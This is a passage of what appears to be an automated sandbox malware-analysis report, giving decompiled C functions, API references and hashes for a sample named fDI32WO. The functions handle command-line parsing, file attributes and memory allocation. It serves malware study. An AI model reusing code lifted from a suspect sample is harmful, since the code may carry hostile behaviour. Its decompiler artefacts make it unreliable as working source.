                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF04C321042509BF3397A1D9884B66BFDE9B86350F28016EE8DAC3205DA658C4683A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A8621E() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					0x4f0 = 2;
                                                                                                                                                                                                                                              					_t9 = E00A8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					_t9 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00a86229
                                                                                                                                                                                                                                              0x00a86230
                                                                                                                                                                                                                                              0x00a86247
                                                                                                                                                                                                                                              0x00a8626a
                                                                                                                                                                                                                                              0x00a86272
                                                                                                                                                                                                                                              0x00a86249
                                                                                                                                                                                                                                              0x00a86255
                                                                                                                                                                                                                                              0x00a8625f
                                                                                                                                                                                                                                              0x00a86264
                                                                                                                                                                                                                                              0x00a86264
                                                                                                                                                                                                                                              0x00a86284

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A8623F
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 381621628-0
                                                                                                                                                                                                                                              • Opcode ID: bd7ecc4280ebe9347eb5eb492a29fce9a0ab8500cae5ebcb74a76ab09b383bd7
                                                                                                                                                                                                                                              • Instruction ID: 77ad98409431bb8256fcdee499b8ac2bf38d7e98fb8c4defe516828881a827ee
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd7ecc4280ebe9347eb5eb492a29fce9a0ab8500cae5ebcb74a76ab09b383bd7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0BEB0A04208ABE750FBB48E06BFA32BCDB54300F4000AAA986DA081EE749D458750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A84B60(signed int _a4) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t15 + 0xa88d64)) != 1) {
                                                                                                                                                                                                                                              					_t9 = FindCloseChangeNotification( *(_t15 + 0xa88d74)); // executed
                                                                                                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                                                                                                              						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0xa88d60)) = 1;
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d60)) = 1;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d68)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d70)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d6c)) = 0;
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x00a84b66
                                                                                                                                                                                                                                              0x00a84b74
                                                                                                                                                                                                                                              0x00a84b98
                                                                                                                                                                                                                                              0x00a84ba0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84bac
                                                                                                                                                                                                                                              0x00a84ba4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84ba4
                                                                                                                                                                                                                                              0x00a84b78
                                                                                                                                                                                                                                              0x00a84b7e
                                                                                                                                                                                                                                              0x00a84b84
                                                                                                                                                                                                                                              0x00a84b8a
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A84FA1,00000000), ref: 00A84B98
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                                                              • Opcode ID: 011e78a4af22a6ae84c6861ed8053f87c444d657f551e77b823f4bedf090c01d
                                                                                                                                                                                                                                              • Instruction ID: a57084fc0b796d50a868d9764f70bb3c0319a3af65f8fb5ec2fc616e3fb877aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 011e78a4af22a6ae84c6861ed8053f87c444d657f551e77b823f4bedf090c01d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16F01C31540B099EAB71EF7ACC04652BBE4AAA9360350092EA46ED2191EF34A851DBD0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A866AE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				unsigned int _t1;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                              				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                              					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x00a866b1
                                                                                                                                                                                                                                              0x00a866ba
                                                                                                                                                                                                                                              0x00a866c7
                                                                                                                                                                                                                                              0x00a866bc
                                                                                                                                                                                                                                              0x00a866be
                                                                                                                                                                                                                                              0x00a866be

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00A84777,?,00A84E38,?), ref: 00A866B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                              • Opcode ID: c4938ab956a889527b3f502aae7f1f672f5220a897ba71b95c91f78019d569e0
                                                                                                                                                                                                                                              • Instruction ID: 584c0cad5470b781bfc6ab81c542068196b2e6f2aa1682291a826cfc4a1f919c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4938ab956a889527b3f502aae7f1f672f5220a897ba71b95c91f78019d569e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69B09276222480427A2457716C295562951B6D123A7E41BA1F032C01E0DA3EC846D204
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A84CA0(long _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x00a84caa
                                                                                                                                                                                                                                              0x00a84cb1

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A84CAA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3761449716-0
                                                                                                                                                                                                                                              • Opcode ID: 35ba6db91a8978b27ceae051d74c54fb391dbfdc45f9962a3655bc6c7a8db8ad
                                                                                                                                                                                                                                              • Instruction ID: 89fcfbb44632dc79ac57acfaece7f2d8b6a59683593103fa9ab302a5b6f8b59b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35ba6db91a8978b27ceae051d74c54fb391dbfdc45f9962a3655bc6c7a8db8ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB0123204420CB7DF001FC2EC09F853F2DE7C4761F240001F60C454508A7294218796
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A84CC0(void* _a4) {
                                                                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                                                                              			}




                                                                                                                                                                                                                                              0x00a84cc8
                                                                                                                                                                                                                                              0x00a84ccf

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                                                                                                                              • Opcode ID: 5a0db84c3ed18c3c8e65beb4cc8f0fb0fa5175abb223111d0724d68bf39bcc9b
                                                                                                                                                                                                                                              • Instruction ID: cacec7a222c3a5fae332e4a2c04fb76eed61b7d5eeddc8f5ac3266b0ba9a70ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0db84c3ed18c3c8e65beb4cc8f0fb0fa5175abb223111d0724d68bf39bcc9b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7B0123100010CB78F001B82EC088453F2DD6C02607000011F50C455218B3398228685
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E00A85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                              				CHAR* _v265;
                                                                                                                                                                                                                                              				char _v266;
                                                                                                                                                                                                                                              				char _v267;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				CHAR* _v272;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				signed int _v296;
                                                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				CHAR* _t69;
                                                                                                                                                                                                                                              				signed int _t71;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				char _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				void* _t132;
                                                                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                                                                              				signed int _t143;
                                                                                                                                                                                                                                              				CHAR* _t144;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				void* _t146;
                                                                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                                                                              				char _t155;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                                                              				char _t167;
                                                                                                                                                                                                                                              				char _t170;
                                                                                                                                                                                                                                              				CHAR* _t173;
                                                                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                                                                              				CHAR* _t199;
                                                                                                                                                                                                                                              				void* _t200;
                                                                                                                                                                                                                                              				CHAR* _t201;
                                                                                                                                                                                                                                              				void* _t205;
                                                                                                                                                                                                                                              				void* _t206;
                                                                                                                                                                                                                                              				int _t209;
                                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                                              				void* _t213;
                                                                                                                                                                                                                                              				CHAR* _t218;
                                                                                                                                                                                                                                              				intOrPtr* _t219;
                                                                                                                                                                                                                                              				intOrPtr* _t220;
                                                                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                                                                              				_t61 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                                                                              				_t209 = 1;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					while(_t209 != 0) {
                                                                                                                                                                                                                                              						_t67 =  *_t173;
                                                                                                                                                                                                                                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                              							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v272 = _t173;
                                                                                                                                                                                                                                              						if(_t67 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t69 = _v272;
                                                                                                                                                                                                                                              							_t177 = 0;
                                                                                                                                                                                                                                              							_t213 = 0;
                                                                                                                                                                                                                                              							_t163 = 0;
                                                                                                                                                                                                                                              							_t202 = 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								if(_t213 != 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t69 =  *_t69;
                                                                                                                                                                                                                                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t69 = _v272;
                                                                                                                                                                                                                                              										L21:
                                                                                                                                                                                                                                              										_t155 =  *_t69;
                                                                                                                                                                                                                                              										if(_t155 != 0x22) {
                                                                                                                                                                                                                                              											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              												goto L106;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                              												_t177 = _t177 + 1;
                                                                                                                                                                                                                                              												_t202 = _t202 + 1;
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                              												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              													L106:
                                                                                                                                                                                                                                              													_t63 = 0;
                                                                                                                                                                                                                                              													L125:
                                                                                                                                                                                                                                              													_pop(_t210);
                                                                                                                                                                                                                                              													_pop(_t212);
                                                                                                                                                                                                                                              													_pop(_t162);
                                                                                                                                                                                                                                              													return E00A86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                              													_t177 = _t177 + 1;
                                                                                                                                                                                                                                              													_t202 = _t202 + 1;
                                                                                                                                                                                                                                              													_t157 = 2;
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												if(_t213 != 0) {
                                                                                                                                                                                                                                              													_t163 = 1;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t213 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L131;
                                                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                                                              								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                              								_t69 = _v272;
                                                                                                                                                                                                                                              							} while ( *_t69 != 0);
                                                                                                                                                                                                                                              							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                              								E00A86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                              								asm("int3");
                                                                                                                                                                                                                                              								_push(_t221);
                                                                                                                                                                                                                                              								_t222 = _t223;
                                                                                                                                                                                                                                              								_t71 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                              									0x4f0 = 2;
                                                                                                                                                                                                                                              									_t75 = E00A8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                              									 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              									_t75 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								return E00A86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                              								if(_t213 == 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										goto L34;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L40;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										_t79 = _v268;
                                                                                                                                                                                                                                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                              											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                              											if(_t83 == 0) {
                                                                                                                                                                                                                                              												_t202 = 0x521;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x521, 0xa81140, 0, 0x40, 0);
                                                                                                                                                                                                                                              												_t85 =  *0xa88588; // 0x0
                                                                                                                                                                                                                                              												if(_t85 != 0) {
                                                                                                                                                                                                                                              													CloseHandle(_t85);
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t87 = _t83 - 4;
                                                                                                                                                                                                                                              											if(_t87 == 0) {
                                                                                                                                                                                                                                              												if(_v266 != 0) {
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t50;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t88 =  *_t183;
                                                                                                                                                                                                                                              															_t183 = _t183 + 1;
                                                                                                                                                                                                                                              														} while (_t88 != 0);
                                                                                                                                                                                                                                              														if(_t183 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t205 = 0x5b;
                                                                                                                                                                                                                                              															if(E00A8667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                              																L115:
                                                                                                                                                                                                                                              																_t206 = 0x5d;
                                                                                                                                                                                                                                              																if(E00A8667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                              																	L117:
                                                                                                                                                                                                                                              																	_t202 =  &_v276;
                                                                                                                                                                                                                                              																	_v276 = _t167;
                                                                                                                                                                                                                                              																	if(E00A85C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t202 = 0x104;
                                                                                                                                                                                                                                              																		E00A81680(0xa88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t202 = 0x5b;
                                                                                                                                                                                                                                              																	if(E00A8667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		goto L117;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t202 = 0x5d;
                                                                                                                                                                                                                                              																if(E00A8667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L115;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *0xa88a24 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L50;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t100 = _t87 - 1;
                                                                                                                                                                                                                                              												if(_t100 == 0) {
                                                                                                                                                                                                                                              													L98:
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t38;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t101 =  *_t192;
                                                                                                                                                                                                                                              															_t192 = _t192 + 1;
                                                                                                                                                                                                                                              														} while (_t101 != 0);
                                                                                                                                                                                                                                              														if(_t192 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t202 =  &_v276;
                                                                                                                                                                                                                                              															_v276 = _t170;
                                                                                                                                                                                                                                              															if(E00A85C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
